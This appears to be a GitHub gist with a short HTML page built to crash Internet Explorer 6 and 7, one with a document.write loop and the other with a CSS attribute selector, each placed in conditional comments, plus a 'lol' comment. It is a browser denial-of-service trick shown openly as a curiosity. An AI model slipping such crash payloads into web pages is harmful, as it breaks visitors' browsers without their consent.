Skip to content

Instantly share code, notes, and snippets.

@nathansmith
Last active September 24, 2015 09:08
Show Gist options
  • Save nathansmith/724308 to your computer and use it in GitHub Desktop.
Save nathansmith/724308 to your computer and use it in GitHub Desktop.
This should crash IE6 & IE7.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Crash IE6 + IE7</title>
<!--[if IE 6]>
<script>
for (x in document.write) {
document.write(x);
}
</script>
<![endif]-->
<!--[if IE 7]>
<style>
button[value=""]{}
</style>
<![endif]-->
</head>
<body>
This should crash in IE6 + IE7.
</body>
</html>
@OscarGodson
Copy link

lol

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment